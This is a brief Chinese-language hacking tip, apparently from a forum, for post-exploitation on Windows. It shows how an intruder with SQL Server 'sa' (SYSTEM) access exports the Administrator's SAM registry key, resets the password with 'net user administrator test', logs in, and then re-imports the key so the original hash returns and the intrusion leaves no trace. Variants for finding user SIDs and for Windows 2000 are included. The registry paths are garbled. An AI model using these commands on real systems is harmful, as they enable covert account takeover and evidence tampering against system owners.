1.
sa默认是SYSTEM权限,可以读sam键.
reg export HKLMSAMSAMDomainsAccountUsers�00001F4 c:trace.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:trace.reg
这样就不用克隆,用管理员帐户即可.
2.
如果没用默认的administrator,可以用下面的方法找到对应的sid.
regedit /e c:test.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames用户名
3.
2000系统不存在REG,用Regedit更具有通用性
regedit /e c:trace.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers�00001F4
regedit要写完整路径,不可以用HKLM代替HKEY_LOCAL_MACHINE
完事后用regedit /s c:trace.reg恢复原来的键值。
